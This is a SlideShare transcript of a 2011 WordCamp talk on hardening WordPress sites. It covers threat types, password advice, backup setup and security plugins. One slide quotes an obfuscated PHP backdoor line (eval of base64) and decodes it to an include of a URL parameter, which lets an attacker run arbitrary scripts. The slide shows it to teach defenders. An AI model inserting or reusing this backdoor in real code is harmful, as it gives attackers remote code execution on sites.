Securing Your WordPress Website by Vlad Lasky


Published on

Vlad is a computer systems engineer with a humorous and educational story to tell about WordPress security. This presentation gives every WordPress site administrator tips on how to harden their site against would-be attackers and avoid inadvertently doing things that could compromise site security.

Published in: Technology, Business
1 Comment
  • The most recent version of my presentation slides can be found here:
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Securing Your WordPress Website by Vlad Lasky

  1. 1. Securing Your WordPress Website Vladimir Lasky WordCamp GC 2011
  2. 2. For the Impatient, Lazy and Easily Distracted <ul><li>Rename your admin account </li></ul><ul><li>Only download plugins and themes hosted on and regularly update them </li></ul><ul><li>Change your database table prefix from “wp_” to something random using “WordPress Table Rename” plugin </li></ul><ul><li>Install the plugin “Semisecure Login Reimagined” </li></ul>
  3. 3. Does This Describe You? <ul><li>Seldom update your WordPress installation & plugins </li></ul><ul><li>Seldom backup your WordPress installation & plugins </li></ul><ul><li>Access your WordPress site over public computers and/or Wi-Fi networks </li></ul><ul><li>Use the same password on multiple websites </li></ul><ul><li>Download themes and plugins from third-party sites or file sharing networks </li></ul><ul><li>Rely on cheap developers found through online freelance websites </li></ul><ul><li>You may be at risk! </li></ul>
  4. 4. How We Achieve Security <ul><li>The only perfect security is to not have a website - Anything else is relative </li></ul><ul><li>Our goals: </li></ul><ul><ul><li>Make the attacker pick on a weaker target </li></ul></ul><ul><ul><li>Avoid creating a security hole ourselves </li></ul></ul><ul><li>Our plan: </li></ul><ul><ul><li>To use off-the-shelf WordPress plugins where possible and avoid doing anything to break compatibility with other plugins or complicate day-to-day activities </li></ul></ul>
  5. 5. The Three Pillars of Security PREVENTION DETECTION RECOVERY
  6. 6. Know Your Enemy <ul><li>Cyber Criminals </li></ul><ul><li>Cheap Thrill Seekers AKA “Script Kiddies” </li></ul><ul><li>Business Rivals </li></ul><ul><li>Disgruntled Employees </li></ul><ul><li>Ideological Enemies </li></ul>
  7. 7. What Do Attackers Want to Achieve? <ul><li>Cheap thrills </li></ul><ul><li>Material for identity theft </li></ul><ul><li>Damage reputation of a business </li></ul><ul><li>Disrupt e-Commerce </li></ul><ul><li>To create a &quot;Botnet“ – a staging point for attacks against a third party. </li></ul><ul><li>Obtaining restricted information </li></ul><ul><li>Black-hat SEO (usually backlink generation) </li></ul>
  8. 8. Characterising Security Threats <ul><li>Active/Passive Method </li></ul><ul><li>The aims of the other party </li></ul><ul><li>Their knowledge of you </li></ul><ul><li>Their level of motivation </li></ul><ul><li>The level of difficulty required </li></ul><ul><li>What is their alternative option </li></ul>
  9. 9. Top Security Threats <ul><li>Brute Force Password Attacks </li></ul><ul><li>Code Injection Attacks (SQL/PHP and XSS) </li></ul><ul><li>Denial of Service Attacks </li></ul><ul><li>Sniffing Network Traffic to Recover Plaintext Passwords and Session Cookies </li></ul><ul><li>Malicious Code within Themes/Plugins </li></ul>
  10. 10. Brute Force Password Attack Example
  11. 11. Classic SQL Injection Example
  12. 12. Malicious Code Example <ul><li>The following is a line of obfuscated PHP code in a compromised plugin or theme: </li></ul><ul><ul><li>eval(base64_decode(&quot;aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs=&quot;)); </li></ul></ul><ul><li>This evaluates as the following PHP statement: </li></ul><ul><ul><li>if(isset($_GET[&quot;cmd&quot;]))include $_GET[&quot;cmd&quot;]; </li></ul></ul><ul><li>This allows an attacker to run any PHP script on your site by setting the query parameter ‘cmd’ in the URL: </li></ul><ul><ul><li> </li></ul></ul>
  13. 13. Good Habits <ul><li>Only obtain free plugins and themes hosted on </li></ul><ul><li>Buy premium plugins/themes from the Author's website, which should have their contact details </li></ul><ul><li>Update your WordPress installation and plugins regularly </li></ul><ul><li>When travelling, access the Internet from your own smartphone or notebook computer – not from an Internet Cafe </li></ul>
  14. 14. Choosing a Password <ul><li>Twelve characters long as a minimum, but not a dictionary word </li></ul><ul><li>Common number/letter substitutions are not very useful </li></ul><ul><li>A good mnemonic technique: come up with a memorable sentence, and use the first letters of each word to form the password e.g. </li></ul><ul><ul><li>“ Jack and Jill went up the hill to fetch a pale of water” could form a 13-character password “JaJwuthtfapow” </li></ul></ul>
  15. 15. Secure Your Backups <ul><li>Most automated backup plugins operate this way: </li></ul><ul><ul><li>They archive your database and installation files </li></ul></ul><ul><ul><li>They upload this archive to a remote site using saved authentication details </li></ul></ul><ul><li>If your site is compromised, these saved authentication details could be used to destroy your saved backups </li></ul><ul><li>The solution: Automated Remote Backups </li></ul>
  16. 16. Automated Remote Backups <ul><li>Instead: </li></ul><ul><ul><li>Use the backup plugin ONLY to archive your Database and Installation files and place them in a a private folder </li></ul></ul><ul><ul><li>Configure a remote system to periodically connect to your site via SFTP/FTP and download this backup file. </li></ul></ul><ul><li>If a hacker compromises your system, they will not be able to destroy your saved backups </li></ul><ul><li>Good article on implementing this: </li></ul><ul><ul><li> </li></ul></ul>
  17. 17. Plugin: Semisecure Login Reimagined <ul><li>Purpose </li></ul><ul><ul><li>Encrypts passwords without requiring SSL. Instead, it uses JavaScript to encrypt the password </li></ul></ul><ul><li>Benefits: </li></ul><ul><ul><li>Simple installation – just activate </li></ul></ul><ul><ul><li>Eliminates risk of obtaining password by sniffing network traffic </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>All other traffic is unencrypted. WordPress session cookie is still vulnerable </li></ul></ul>
  18. 18. Plugin: WordPress HTTPS (SSL) <ul><li>Purpose: </li></ul><ul><ul><li>All traffic between Web Browser and Blog is encrypted </li></ul></ul><ul><li>Benefits: </li></ul><ul><ul><li>Eliminates risk of password sniffing and session hijacking </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Requires a web host with a Shared SSL certificate (HostGator, BlueHost). </li></ul></ul><ul><ul><li>Alternatively, you must obtain a SSL Certificate in the name of your primary Domain and get your web host to install it. </li></ul></ul><ul><ul><li>Higher CPU Usage on web server </li></ul></ul>
  19. 19. Plugin: Theme Authenticity Checker <ul><li>Purpose: </li></ul><ul><ul><li>Scans your theme files for presence of code that is likely to be malicious </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>Rapidly scans theme files without having to look through code manually </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Does not scan plugins </li></ul></ul><ul><ul><li>Not guaranteed to find all types of malicious code </li></ul></ul>
  20. 20. Plugin: WordPress File Monitor Plus <ul><li>Purpose </li></ul><ul><ul><li>Periodically checks to see if any files have been added, changed or deleted in your WordPress installation </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>Will detect many types of PHP injection attacks and other forms of intrusion </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Will generate false alarms. You may specify folders to be excluded, but then there is a risk that those could be compromised unknowingly </li></ul></ul><ul><ul><li>Small chance that a very well-targeted attack could inactivate or sabotage the plugin before it raises the alarm </li></ul></ul>
  21. 21. Plugin: WordPress Firewall 2 <ul><li>Purpose </li></ul><ul><ul><li>Monitors web requests and blocks those that seem suspicious </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>Will block majority of SQL and PHP Injection attempts </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Small performance overhead on each request </li></ul></ul><ul><ul><li>On most aggressive setting, could interfere with some plugins </li></ul></ul>
  22. 22. Plugin: Useful 404s <ul><li>Purpose </li></ul><ul><ul><li>Detects broken links on your website, or broken links on external sites and sends you an email </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>As a side effect, it also can detect attempts to compromise your site – namely, where the attacker spoofs the HTTP_REFERER flag and attempts to blindly access plugins or theme files that may not exist </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Lots and lots of false alarms </li></ul></ul>
  23. 23. Plugin: Email PHP Errors Plugin <ul><li>Purpose </li></ul><ul><ul><li>Captures PHP error output and can also generate emails with error reports. Helps detect bugs in plugins, themes or problems with the web host </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>As a side effect, may detect some types of PHP injection attempts or other attempts to exploit code vulnerabilities </li></ul></ul><ul><ul><li>People often overlook their error_logs and let them pile up </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Lots of false alarms </li></ul></ul>
  24. 24. Plugin: WP-Ban <ul><li>Purpose </li></ul><ul><ul><li>Ban users by IP, IP Range, host name, user agent and referrer URL from visiting your site </li></ul></ul><ul><li>Benefit : </li></ul><ul><ul><li>Useful for blocking repeat attacks by the same party </li></ul></ul><ul><ul><li>Able to reduce the impact of denial of service (DOS) attacks </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Need to determine details of specific attacker(s) </li></ul></ul><ul><ul><li>A wise attacker will change their IP addresses frequently </li></ul></ul><ul><ul><li>Can block innocent people </li></ul></ul>
  25. 25. Conclusion <ul><li>WordPress Codex - Hardening WordPress </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li>Various tips for site administrators to improve your site security </li></ul></ul><ul><li>WordPress Codex – Data Validation </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li>A must for developers - describes all the facilities available in WordPress to validate data, preventing your code from being vulnerable to code injection exploits </li></ul></ul><ul><li>Questions and Comments: </li></ul><ul><ul><li> </li></ul></ul>